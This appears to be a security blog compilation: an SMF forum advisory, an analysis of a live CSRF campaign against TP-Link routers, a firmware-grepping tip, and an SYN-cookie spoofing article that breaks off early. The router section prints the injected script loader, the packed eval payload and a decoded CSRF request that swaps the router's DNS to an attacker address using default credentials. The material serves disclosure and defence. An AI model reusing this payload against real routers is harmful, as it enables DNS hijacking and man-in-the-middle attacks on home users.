Multiple vulnerabilities in SMF forum software

I. Introduction

Simple Machines Forum (abbreviated as SMF) is a free Internet forum (BBS) software written in PHP.

II. Username faking via Unicode homoglyphs or duplicate spaces allows user impersonation

The forum registration process allows registering UTF-8 usernames. Unicode contains many additional symbols, and some of them look very similar (or even identical) to standard ASCII characters. This allows registering a user with a name that is visually indistinguishable from an existing forum user. As an example, someone may register a user named "admiո" with the "n" replaced by the Unicode letter U+0578 (ARMENIAN SMALL LETTER VO), which, depending on the font, looks more or less exactly like the ASCII character "n". This may be used to impersonate users, e.g. in forum messages. In addition to choosing a name that looks almost exactly like the victim's, an attacker can also steal the victim's avatar to further improve the illusion.

The following page simplifies finding matching homoglyph characters for a given string:

http://www.irongeek.com/homoglyph-attack-generator.php

If the original username contains a space, user impersonation is also possible by registering the same username with two or more consecutive spaces. These spaces are passed unchanged into all HTML pages containing the username. Web browsers collapse multiple consecutive spaces in HTML into one, so there is no visible difference between the original and the faked username.
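A registration check against both tricks could compare a normalized "skeleton" of each name instead of the raw string. The following Python sketch is a simplified take on the skeleton idea from Unicode Technical Standard #39, which is the data behind PHP's Spoofchecker class. The `CONFUSABLES` table is a tiny hypothetical excerpt; a real implementation would load the full confusables data. The function names are illustrative only.

```python
import unicodedata
from typing import Iterable

# Hypothetical, deliberately tiny excerpt of a confusables table; a real
# check would load the full Unicode confusables data instead.
CONFUSABLES = {
    "\u0578": "n",  # ARMENIAN SMALL LETTER VO
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
}


def skeleton(name: str) -> str:
    """Reduce a username to a form in which look-alike names compare equal."""
    # NFKC folds compatibility characters (e.g. fullwidth letters, no-break space).
    normalized = unicodedata.normalize("NFKC", name)
    # Replace known look-alike characters by their ASCII counterpart.
    mapped = "".join(CONFUSABLES.get(ch, ch) for ch in normalized)
    # Collapse runs of whitespace (and trim the ends), as HTML rendering would.
    return " ".join(mapped.split())


def is_confusable(new_name: str, existing_names: Iterable[str]) -> bool:
    """True if new_name would render like one of the existing usernames."""
    key = skeleton(new_name)
    return any(skeleton(existing) == key for existing in existing_names)
```

A registration handler would reject a new name when `is_confusable` returns True. The hard part, as the advisory notes below, is the completeness of the table, not the comparison.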

III. Clickjacking in SMF forum allows user-assisted remote arbitrary code execution

The forum software SMF contains no protection against clickjacking. This allows tricking a currently logged-in user into performing various unintended actions in the forum when the user visits a malicious website. I have a working POC exploit that achieves full remote code execution against a forum administrator. It requires no more than 2 clicks to a predictable location (although I will not disclose the exact attack vector in this public advisory). A cleverly designed attack site may trick the user into making these two clicks without much thinking. The first click can be obtained by displaying one of those annoying overlays that ask the user to fill out a survey, like the site on Facebook or subscribe to a newsletter. Most users are conditioned to click directly on the small x in the top right corner of the overlay to close it. For the second click, the attack site may simply not react to the first click, hoping that the victim tries again. Alternatively, the site could pretend to be a video site waiting for the user to click on the play button.

IV. Affected versions

All three vulnerabilities are present in SMF1 up to version 1.1.18 and SMF2 up to version 2.0.5. The SMF team has released updates (version 1.1.19 and 2.0.6) which fix the clickjacking problem (via an X-Frame-Options header) and the username faking possibility via multiple consecutive spaces. However, the Unicode homoglyph attack has not yet been fixed since it is not trivial to filter out all confusable characters while still allowing legitimate Unicode characters in usernames (especially if you can't use the Spoofchecker class because you have to support PHP versions below 5.4.0).
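For applications that need to add the same protection themselves, the header only has to be attached to every response. Below is a minimal sketch as Python WSGI middleware. It assumes a WSGI application; SMF itself is PHP, so this only illustrates the mechanism, and `frame_protection` is a hypothetical name.

```python
from typing import Callable, Iterable, List, Tuple

Headers = List[Tuple[str, str]]


def frame_protection(app: Callable, policy: str = "SAMEORIGIN") -> Callable:
    """Wrap a WSGI app so that every response carries X-Frame-Options."""

    def wrapped(environ: dict, start_response: Callable) -> Iterable[bytes]:
        def start_with_header(status: str, headers: Headers, exc_info=None):
            # Drop any existing X-Frame-Options header so it is not sent twice.
            headers = [(k, v) for k, v in headers if k.lower() != "x-frame-options"]
            headers.append(("X-Frame-Options", policy))
            return start_response(status, headers, exc_info)

        return app(environ, start_with_header)

    return wrapped
```

`SAMEORIGIN` still lets the site frame its own pages, while `DENY` forbids framing entirely.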

V. Credits

Jakob Lell

Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers

Introduction

Today the majority of wired Internet connections are used with an embedded NAT router. This allows several devices to share the same Internet connection and also provides some protection against incoming attacks from the Internet. Most of these routers can be configured via a web interface. Unfortunately, many of these web interfaces suffer from common web application vulnerabilities such as CSRF, XSS, insecure authentication and session management, or command injection. In the past years countless vulnerabilities have been discovered and publicly reported. Many of them have remained unpatched by vendors, and even if a patch is available, it is typically installed on only a small fraction of the affected devices. Despite these widespread vulnerabilities, there have been very few public reports of real-world attacks against routers so far. This article exposes an active exploitation campaign against a known CSRF vulnerability (CVE-2013-2645) in various TP-Link routers. When a user visits a compromised website, the exploit tries to change the upstream DNS server of the router to an attacker-controlled IP address, which can then be used to carry out man-in-the-middle attacks.

Analysis of the exploit

This section describes one occurrence of the exploit. I have seen five different instances of the exploit on unrelated websites so far and the details of the obfuscation differ between them. However, the actual requests generated by the exploits are the same except for the DNS server IP addresses.

As you would expect for malicious content added to a website, the exploit is hidden in obfuscated javascript code. The first step is a line of javascript appended to a legitimate javascript file used by the website:

document.write("<script type=\"text/javascript\" src=\"http://www.[REDACTED].com/js/ma.js\">");

It is possible that the cybercrooks append this line to various javascript files on compromised web servers in an automated way.

This code just dynamically adds a new script tag to the website in order to load further javascript code from an external server. The referenced file "ma.js" contains the following encoded javascript code:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('T w$=["\\E\\6\\5\\m\\o\\3\\q\\5\\m\\8\\3\\7\\"\\5\\3\\G\\5\\j\\r\\6\\6\\"\\y\\B\\d\\e\\8\\v\\4\\5\\q\\u\\4\\o\\H\\n\\5\\5\\8\\A\\j\\j\\a\\i\\e\\d\\f\\A\\a\\i\\e\\d\\f\\B\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\j\\u\\6\\3\\4\\z\\8\\e\\j\\s\\a\\f\\F\\n\\r\\8\\C\\3\\4\\l\\3\\4\\z\\8\\e\\1\\n\\5\\e\\I\\i\\n\\r\\8\\6\\3\\4\\l\\3\\4\\7\\2\\c\\d\\8\\2\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\b\\b\\c\\d\\8\\h\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\k\\k\\c\\s\\3\\a\\6\\3\\7\\2\\h\\b\\c\\Q\\a\\5\\3\\x\\a\\m\\7\\b\\1\\b\\1\\b\\1\\b\\c\\i\\v\\e\\a\\d\\f\\7\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\7\\2\\b\\g\\1\\2\\9\\P\\1\\D\\g\\1\\9\\R\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\h\\7\\9\\1\\9\\1\\9\\1\\9\\c\\C\\a\\l\\3\\7\\p\\t\\2\\p\\S\\D\\O\\p\\t\\K\\p\\J\\g\\L\\N\\E\\j\\6\\5\\m\\o\\3\\y\\q"];M["\\x\\4\\d\\5\\3\\o\\f"](w$[0]);',56,56,'|x2e|x31|x65|x72|x74|x73|x3d|x70|x38|x61|x30|x26|x69|x6d|x6e|x36|x32|x64|x2f|x39|x76|x79|x68|x6c|x25|x20|x63|x4c|x42|x75|x6f|_|x77|x3e|x52|x3a|x40|x53|x33|x3c|x44|x78|x28|x3f|x45|x34|x29|document|x3b|x2b|x37|x67|x35|x41|var'.split('|'),0,{}))

At first this code looks quite complicated and you probably don't want to analyze and decode it manually. However, it is clearly visible that the file contains just one big eval call. The parameter to eval (the code that is executed) is computed dynamically by an anonymous function from the parameters p,a,c,k,e,d. A little bit of googling for "eval(function(p,a,c,k,e,d)" shows that this is the output of a publicly available javascript obfuscator. There are several online javascript deobfuscators you can use to reverse engineer the packed javascript. Alternatively, you can replace "eval" with "console.log" and paste the code into the javascript console of Chrome Developer Tools. This prints the decoded javascript, which would otherwise be passed to eval. The result of the decoding is the following code:

var _$ = ["\x3c\x73\x74\x79\x6c\x65\x20\x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x63\x73\x73\"\x3e\x40\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x28\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x6d\x69\x6e\x3a\x61\x64\x6d\x69\x6e\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x2f\x75\x73\x65\x72\x52\x70\x6d\x2f\x4c\x61\x6e\x44\x68\x63\x70\x53\x65\x72\x76\x65\x72\x52\x70\x6d\x2e\x68\x74\x6d\x3f\x64\x68\x63\x70\x73\x65\x72\x76\x65\x72\x3d\x31\x26\x69\x70\x31\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x30\x26\x69\x70\x32\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x39\x39\x26\x4c\x65\x61\x73\x65\x3d\x31\x32\x30\x26\x67\x61\x74\x65\x77\x61\x79\x3d\x30\x2e\x30\x2e\x30\x2e\x30\x26\x64\x6f\x6d\x61\x69\x6e\x3d\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x3d\x31\x30\x36\x2e\x31\x38\x37\x2e\x33\x36\x2e\x38\x35\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x32\x3d\x38\x2e\x38\x2e\x38\x2e\x38\x26\x53\x61\x76\x65\x3d\x25\x42\x31\x25\x41\x33\x2b\x25\x42\x34\x25\x45\x36\x29\x3b\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x20"];
document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);
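If you'd rather not run untrusted code in a browser at all, the unpacking step can also be reproduced offline. The following Python sketch ports the two ingredients of the packed function as it appears in ma.js:

* the helper `e()`, which turns an index into a base-`a` token (digits, then lowercase letters, then `chr(c + 29)`);
* the single pass that replaces every word token in `p` with the corresponding entry of `k`.

It is written against this one sample only; other packer variants may differ. The names `encode_index` and `unpack` are hypothetical.

```python
import re
from typing import List

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_index(c: int, a: int) -> str:
    """Port of the packer's e() helper: index -> base-a token."""
    prefix = "" if c < a else encode_index(c // a, a)
    c %= a
    # Values 0-35 use 0-9a-z, larger values use chr(c + 29), i.e. 'A' for 36.
    return prefix + (chr(c + 29) if c > 35 else DIGITS[c])


def unpack(p: str, a: int, c: int, k: List[str]) -> str:
    """Rebuild the code that the packed function would hand to eval()."""
    # Token -> word; empty words map to the token itself (k[c] || e(c)).
    table = {encode_index(i, a): (k[i] or encode_index(i, a)) for i in range(c)}
    # One pass over all word tokens, like the packer's \w+ replacement.
    # re.ASCII restricts \w to [A-Za-z0-9_] as in JavaScript. Unknown tokens
    # are left unchanged here (the JavaScript original would insert "undefined").
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p,
                  flags=re.ASCII)
```

To decode the whole file, call it as `unpack(p, 56, 56, k)`. Here `p` is the packed string and `k` is the word list split on `|`, both taken as string values, i.e. after JavaScript's own literal unescaping. This should produce the code shown above without executing anything.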

Although the decoded code is still obfuscated, it can easily be understood by decoding the hex-encoded strings. The string "\x77\x72\x69\x74\x65\x6c\x6e" is the hex-encoded version of "writeln". Since javascript allows accessing object properties with bracket notation, the line 'document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);' is just a fancy way of writing 'document.writeln(_$[0]);'. The array element _$[0] contains the data written to the document. After decoding the escaped hex characters you get the following equivalent code:

document.writeln('<style type="text/css">@import url(http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>')
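The remaining hex decoding is also easy to automate. Below is a minimal Python sketch with a hypothetical function name. It resolves `\xNN` escapes and the escaped quotes and backslashes used in the sample, and leaves anything else untouched. It is not a complete JavaScript string-literal parser (no `\uNNNN`, `\n`, etc.).

```python
import re

# \xNN escapes, plus escaped double quotes, single quotes and backslashes.
JS_ESCAPE = re.compile(r"""\\(?:x([0-9A-Fa-f]{2})|(["'\\]))""")


def decode_js_escapes(s: str) -> str:
    """Resolve the escape sequences used in the sample in a single pass."""
    return JS_ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else m.group(2), s
    )
```

Doing it in one pass matters: a decoded backslash must not be re-read as the start of a new escape.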

So the obfuscated javascript adds a style tag to the current html document. The css in this style tag uses @import to instruct the browser to load additional css data from 192.168.1.1, which is the default internal IP address of most NAT routers. So it is obviously a CSRF attack which tries to reconfigure the router. The following section shows an analysis of what the request does with some TP-Link routers.

Analysis of the CSRF payload

It is obvious that the payload tries to reconfigure the options for the DHCP server included in the router at 192.168.1.1. While the parameters also include the start/end of the DHCP ip address range, the main purpose of the exploit is to change the primary DNS server to 106.187.36.85. The secondary nameserver points to a publicly available recursive DNS server (in this case the public DNS server provided by Google) in order to make sure that the user doesn't notice any connectivity problems in case the attacker-controlled nameserver is (temporarily) unavailable for any reason. Searching for the string "userRpm/LanDhcpServerRpm" quickly revealed that the exploit is targeting TP-Link routers. The fact that some TP-Link routers are vulnerable to CSRF attacks has already been publicly reported [1] by Jacob Holcomb in April 2013 and TP-Link has fixed this problem for some devices since then. Experiments have shown that several TP-Link routers are actually vulnerable to this CSRF attack (see below for an incomplete list of affected devices).
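Taking the payload URL apart with a URL parser makes the embedded credentials and the two DNS servers explicit. The following small Python sketch uses only the standard library; the `summarize` name is hypothetical. The query string is decoded as Latin-1 only so that the non-ASCII `Save` value does not produce replacement characters.

```python
from urllib.parse import parse_qs, urlsplit

PAYLOAD_URL = (
    "http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?"
    "dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120"
    "&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85"
    "&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6"
)


def summarize(url: str) -> dict:
    """Pull the interesting fields out of the CSRF payload URL."""
    parts = urlsplit(url)
    # keep_blank_values keeps "domain=", latin-1 avoids replacement characters.
    params = parse_qs(parts.query, keep_blank_values=True, encoding="latin-1")
    return {
        "credentials": (parts.username, parts.password),
        "router": parts.hostname,
        "path": parts.path,
        "primary_dns": params["dnsserver"][0],
        "secondary_dns": params["dnsserver2"][0],
        "dhcp_range": (params["ip1"][0], params["ip2"][0]),
    }
```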

It is also worth noting that a web server should use POST instead of GET for all actions doing persistent changes to the router. This can protect against attacks in some scenarios where the attacker can only trigger loading a given URL e.g. by posting an image to a public discussion board or sending an HTML email (which could also be used to trigger attacks like this if the victim has enabled loading of remote images). However, even a POST request to the router can be issued in an automated way if the attacker can execute javascript code in the client browser. So in order to further protect against CSRF the server should either add a securely generated CSRF token or use strict referer checking (which is easier to implement on embedded devices).
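Both countermeasures are small. The following Python sketch shows what a strict referer check and a CSRF token comparison could look like on the server side. The function names are hypothetical, and a real firmware would implement this in its own web server code. The referer check rejects requests without a Referer header, which is what makes it "strict". It compares scheme, host and port rather than doing a prefix match, so that a host such as `192.168.1.1.evil.example` does not pass.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin(url: str) -> Tuple[str, Optional[str], Optional[int]]:
    """(scheme, host, port) with the default port filled in."""
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port or DEFAULT_PORTS.get(parts.scheme))


def referer_allows(referer: Optional[str], interface_url: str) -> bool:
    """Strict check: a state-changing request needs a same-origin Referer."""
    if not referer:
        return False  # a missing Referer is rejected, not waved through
    return _origin(referer) == _origin(interface_url)


def new_csrf_token() -> str:
    """Unpredictable per-session token to embed in the router's forms."""
    return secrets.token_hex(16)


def csrf_token_valid(expected: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token with the session's."""
    return submitted is not None and hmac.compare_digest(expected, submitted)
```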

The affected TP-Link routers use HTTP Basic Authentication to control access to the web interface. When entering the credentials to access the web interface, the browser typically asks the user whether he wants to permanently store the password in the browser. However, even if the user doesn't want to permanently store the password in the browser, it will still temporarily remember the password and use it for the current session. Since the session is only controlled by the browser behavior, the router can't actively terminate the session e.g. after a certain timeout or when clicking a logout button. Due to this limitation of HTTP Basic Authentication the configuration web interface has no logout button at all and the only way to terminate the session is closing and reopening the browser.

The CSRF exploit also includes the default credentials (username=admin, password=admin) in the URL. However, even if a username/password combination is given in the URL, the browser first ignores it and tries the saved credentials or no authentication. Only if this results in an HTTP 401 (Unauthorized) status code does the browser resend the request with the credentials from the URL. Due to this browser behavior, the exploit works if the user is either logged in to the router or hasn't changed the default password.
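With Basic Authentication there is no server-side session to expire. The browser simply attaches an `Authorization` header to each request, and the header value is nothing more than the Base64 encoding of `username:password` (RFC 7617). The following minimal Python sketch, with a hypothetical helper name, shows how that header is built:

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Value of the Authorization header for HTTP Basic Authentication."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token
```

The header is the same whether the credentials come from the browser's cache or from the URL. As a result, the router cannot tell a forged request from a legitimate one.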

Consequences of a malicious DNS server

When an attacker has changed the upstream DNS server of a router, he can carry out arbitrary man-in-the-middle attacks against users of the compromised router. Here is a list of possible actions that can be carried out by redirecting certain DNS hostnames to an attacker server:
* Redirect users to phishing sites when opening a legitimate website
* Redirect users to browser exploits
* Block software upgrades
* Attack software updaters which don't use cryptographic signatures
* Replace advertisements on websites by redirecting adservers (that's what the DNSChanger malware did [2])
* Replace executable files downloaded from the official download site of legitimate software vendors
* Hijack email accounts by stealing the password if the mail client doesn't enforce usage of TLS/SSL with a valid certificate
* Intercept communication between Android/iOS apps and their back-end infrastructure

As of now I do not know what kind of attacks the cybercrooks carry out with the malicious DNS servers. I have run some automated checks: I resolved a large number of popular domain names with one of the DNS servers used for the attack and compared the results against a self-hosted recursive resolver. This comparison produced a huge number of false positives. The reasons are the prevalence of round-robin load balancing at the DNS level and location-dependent redirection, used e.g. by CDNs (content delivery networks). Due to time constraints I could only manually verify the IP addresses that appear for a significant number of different hostnames. None of them turned out to be a malicious manipulation. However, it is quite possible that the infected routers are used for targeted attacks against a limited number of websites. If you find out what kind of attacks are carried out using the malicious DNS servers, please drop me an email or leave a comment in my blog.
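The filtering step described above can be sketched in Python as follows. It keeps only answers that the suspicious resolver gives but the reference resolver doesn't, then looks at IP addresses that show up for many hostnames. The input format (a mapping from hostname to the set of returned IP addresses) and the `min_hostnames` threshold are assumptions for illustration; the actual DNS lookups are left out.

```python
from collections import defaultdict
from typing import Dict, Set

Answers = Dict[str, Set[str]]  # hostname -> IP addresses returned


def suspicious_ips(suspect: Answers, reference: Answers,
                   min_hostnames: int = 5) -> Dict[str, Set[str]]:
    """IPs only the suspect resolver returns, if they occur for many hostnames."""
    hostnames_per_ip: Dict[str, Set[str]] = defaultdict(set)
    for hostname, ips in suspect.items():
        # Answers the reference resolver also gave are treated as legitimate.
        for ip in ips - reference.get(hostname, set()):
            hostnames_per_ip[ip].add(hostname)
    # Rare differences are usually load balancing or CDN geo-redirection.
    return {ip: hosts for ip, hosts in hostnames_per_ip.items()
            if len(hosts) >= min_hostnames}
```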

Prevalence of the exploit

I discovered this exploitation campaign with an automated client honeypot system. So far I have spotted the exploit five times on totally unrelated websites. During that time the honeypot generated some 280 GB of web traffic. There were some differences in the obfuscation used for the exploit, but the actual CSRF requests generated are basically the same. The five instances of the exploit tried to change the primary nameserver to three different IP addresses, and there are likely more that I haven't spotted so far.

Recommendations to mitigate the problem

If you are using an affected TP-Link router, you should perform the following steps to prevent it from being affected by this exploit:
* Check whether the DNS servers have already been changed in your router
* Upgrade your router to the latest firmware. The vulnerability has already been patched at least for some devices
* If you don't get an upgrade for your model from TP-Link, you may also check whether it is supported by OpenWRT
* Change the default password to something more secure (if you haven't already done so)
* Don't save your router password in the browser
* Close all other browser windows/tabs before logging in to the router
* Restart your browser when you're finished using the router web interface (since the browser stores the password for the current browser session)

Affected Devices

I have checked the TP-Link routers I had access to for this vulnerability. Some devices do contain the vulnerability but are not affected by the exploits I've seen so far in their default configuration, because they don't use the IP address 192.168.1.1 by default.

  • TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405 is vulnerable (version 3.3.13 build 130325 and later is not vulnerable)
  • TP-Link TL-MR3020: firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n are vulnerable (but not affected by the current exploit in the default configuration)
  • TL-WDR3600: firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n are vulnerable (but not affected by the current exploit in the default configuration)
  • WR710N v1: 3.14.9 Build 130419 Rel.58371n is not vulnerable

It is likely that some other devices are vulnerable as well.

If you want to know whether your router is affected by this vulnerability, you can find it out by performing the following steps:
1. Open a browser and log in to your router
2. Navigate to the DHCP settings and note the DNS servers (it may be 0.0.0.0, which means that it uses the DNS server from your router's upstream internet connection)
3. Open a new browser tab and visit the following URL (you may have to adjust the IP addresses if your router isn't using 192.168.1.1):

http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6

If your router is vulnerable, this changes the DNS servers to 8.8.4.4 and 8.8.8.8 (the two IP addresses of Google Public DNS). Please note that the request also resets the DHCP IP range and lease time to their default values.
4. Go back to the first tab and reload the DHCP settings in the router web interface
5. If you see the servers 8.8.4.4 and 8.8.8.8 for primary and secondary DNS, your router is vulnerable.
6. Revert the DNS settings to the previous settings from step 2
7. If your router is vulnerable, you may also upgrade it to the latest firmware and check whether it is still vulnerable.
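If your router does not use 192.168.1.1, the test URL from step 3 can be regenerated for another address. The following Python sketch uses a hypothetical helper. It assumes a /24 network and derives the DHCP range .100 to .199 from the router's address, mirroring the values in the URL above. The `Save` parameter is kept verbatim.

```python
from urllib.parse import urlencode


def build_test_url(router_ip: str = "192.168.1.1", dns1: str = "8.8.4.4",
                   dns2: str = "8.8.8.8") -> str:
    """Test URL from step 3 for a router at router_ip (assumes a /24 network)."""
    prefix = router_ip.rsplit(".", 1)[0]  # e.g. "192.168.1"
    params = {
        "dhcpserver": "1",
        "ip1": f"{prefix}.100",
        "ip2": f"{prefix}.199",
        "Lease": "120",
        "gateway": "0.0.0.0",
        "domain": "",
        "dnsserver": dns1,
        "dnsserver2": dns2,
    }
    # The Save value is already percent-encoded, so it is appended verbatim.
    return (f"http://{router_ip}/userRpm/LanDhcpServerRpm.htm?"
            f"{urlencode(params)}&Save=%B1%A3+%B4%E6")
```

With the default arguments this reproduces the URL from step 3 exactly. Remember to adjust the DHCP range if your network uses different values.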

Feel free to drop me an email or post a comment with your model number and firmware version so that I can add the device to the list above.

References

[1]: http://securityevaluators.com/content/case-studies/routers/tp-link_wr1043n.jsp
[2]: https://en.wikipedia.org/wiki/DNSChanger

Advanced grepping through directory trees with binary data

When reverse engineering stuff you often get a directory tree with a whole bunch of files (both binaries and text files) and you want to quickly find all occurrences of keywords you are interested in. Typical examples for this problem are program directories of applications, extracted Apps or the root filesystem of an embedded system.

When reverse engineering Linux-based firmware images, you typically start by extracting the root filesystem (or initrd) so that you can analyze the userspace programs, scripts and configuration files. There are already some good tutorials ([1] [2] [3]) and tools like binwalk and firmware-mod-kit which automate many steps of finding/extracting the root filesystem from a binary firmware image. However, once you've got the root filesystem, you often find a whole bunch of files, and it can be quite difficult to find the interesting stuff to analyze. For instance, you may find a juicy configuration variable in /etc and want to find all references to it in the firmware. The standard grep utility does a good job at analyzing text files, but it isn't nearly as useful for binary files, which may still contain the keyword you are looking for. By default, grep only says whether the keyword is there or not. It doesn't display the context around the keyword (as it does for text files). Forcing grep to treat binaries as text files with the -a option doesn't solve the problem either. grep will then output a whole bunch of binary data before and after the match until the next newline, and you probably don't want to see this binary data in your terminal.

But luckily there are a lot of useful standard tools available on a Linux system and you can cleverly combine them to overcome this limitation. I've come up with the following command for grepping through directory trees:

find . -type f -print0|xargs -0 strings -a --print-file-name|grep -i -E ':.*your_keyword_here'|less -S

The find command just searches the current directory tree for files and prints the filenames to standard output, separated by null bytes. Using a null byte instead of a newline makes sure that the pipeline doesn't fail if filenames in the tree contain special characters such as spaces or newlines. The filter "-type f" makes sure that find only returns regular files. Directories, symlinks, devices and unix domain sockets may exist in your tree as well and would cause problems with the following tools.

The output of find is piped to xargs, which calls the command strings for all files found by find. The option "-0" tells xargs that the input is separated by null bytes instead of newlines. The program strings looks through the file and outputs all sequences of at least 4 printable characters. Since grep processes the output of strings and not the actual files, grep can't show the filename of a match (as it does when searching a directory recursively). You typically want to know which files your search results are in, so you can use the option --print-file-name of strings to include the filename in the output. The -a option of strings tells it to scan the whole file and not only certain sections of ELF files.

The next step is to use grep to filter the output of strings for a specific keyword. If you want a case-sensitive search, remove the -i option of grep. The pattern ':.*' before the actual keyword prevents flooding your results with all strings of a file whose filename already contains the keyword. (The filename is prepended by the --print-file-name option of strings.)

Last but not least I recommend piping the results to less -S so that less will only use one line of the screen per result. This makes the results easier to interpret especially if you have really long lines in the results (which occasionally happens with firmware images) and you don't want to have a hundred lines of wrapped text for one single search result. You can still see the full output lines by scrolling horizontally in less (or just use the search function of less to navigate to the actual keyword).
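For comparison, here is the same idea as a single Python script. It walks the tree, skips everything that isn't a regular file, and extracts runs of at least four printable ASCII characters (roughly what strings does by default). It matches the keyword case-insensitively against the extracted string only, not against the filename. This is a sketch rather than a replacement for the pipeline: it reads each file into memory at once, and `grep_strings` is a hypothetical name.

```python
import os
import re
from typing import Iterator

# Runs of at least four printable ASCII characters (tab included).
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e\t]{4,}")


def grep_strings(root: str, keyword: str) -> Iterator[str]:
    """Yield "path: string" lines whose extracted string contains keyword."""
    needle = keyword.lower()
    for dirpath, _dirnames, filenames in os.walk(root):  # no symlinked dirs
        for name in filenames:
            path = os.path.join(dirpath, name)
            # Like find -type f: only regular files, no symlinks, FIFOs or devices.
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue  # skip unreadable files
            for match in PRINTABLE_RUN.finditer(data):
                text = match.group().decode("ascii")
                # Match only the extracted string, not the filename (the ':.*' trick).
                if needle in text.lower():
                    yield f"{path}: {text}"
```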

The search can take some time especially for large directory trees. In that case you can easily speed up the process by saving the output of strings to a file:

find . -type f -print0|xargs -0 strings -a --print-file-name > /tmp/strings.txt

These intermediate results can then be used for many searches:

cat /tmp/strings.txt|grep -i -E ':.*your_keyword_here'|less -S

A test with the 2.1 GB /usr/lib/ directory on my notebook created a 1.2 GB strings.txt and searching this file takes some 10 seconds given that it is still cached in memory.

The same commands can also be used for other reversing tasks such as program directories, extracted apps or even web applications (which may also include binary files like sqlite databases).

If you expect other character encodings such as UTF-16 (which is quite common for Windows applications), you will need to use the -e option of strings. The following command tries ASCII/UTF-8 (8-bit characters), little-endian UTF-16 and little-endian UTF-32:

for enc in S l L;do find . -type f -print0|xargs -0 strings -a -e $enc --print-file-name;done > /tmp/strings.txt
cat /tmp/strings.txt|grep -i -E ':.*your_keyword_here'|less -S
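To see what the l encoding catches that the default doesn't, here is a Python sketch that extracts UTF-16 little-endian strings. It looks for runs of printable ASCII characters, each followed by a zero byte. It only approximates strings -e l, since it ignores characters outside printable ASCII, and the function name is hypothetical.

```python
import re
from typing import List

# At least four printable ASCII characters, each followed by a zero byte.
UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e\t]\x00){4,}")


def utf16le_strings(data: bytes) -> List[str]:
    """Extract ASCII-range UTF-16LE strings, roughly like strings -e l."""
    return [m.group().decode("utf-16-le") for m in UTF16LE_RUN.finditer(data)]
```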

Quick Blind TCP Connection Spoofing with SYN Cookies

Abstract

TCP uses 32 bit Seq/Ack numbers in order to make sure that both sides of a connection can actually receive packets from each other. Additionally, these numbers make it relatively hard to spoof the source address because successful spoofing requires guessing the correct initial sequence number (ISN) which is generated by the server in a non-guessable way. It is commonly known that a 32 bit number can be brute forced in a couple of hours given a fast (gigabit) network connection. This article shows that the effort required for guessing a valid ISN can be reduced from hours to minutes if the server uses TCP SYN Cookies (a widely used defense mechanism against SYN-Flooding DOS Attacks), which are enabled by default for various Linux distributions including Ubuntu and Debian.

I. Recap of TCP Basics

A TCP Connection is initiated with a three-way handshake:

SYN: The Client sends a SYN packet to the server in order to initiate a connection. The SYN packet contains an initial sequence number (ISN) generated by the client.
SYN-ACK: The server acknowledges the connection request by the client. The SYN-ACK Packet contains an ISN generated by the server. It also confirms the ISN from the client in the ack field of the TCP header so that the client can verify that the SYN-ACK packet actually comes from the server and isn't spoofed.
ACK: In the final ACK packet of the three-way handshake the client confirms that it has received the ISN generated by the server. That way the server knows that the client has actually received the SYN-ACK packet from the server and thus the connection request isn't spoofed.

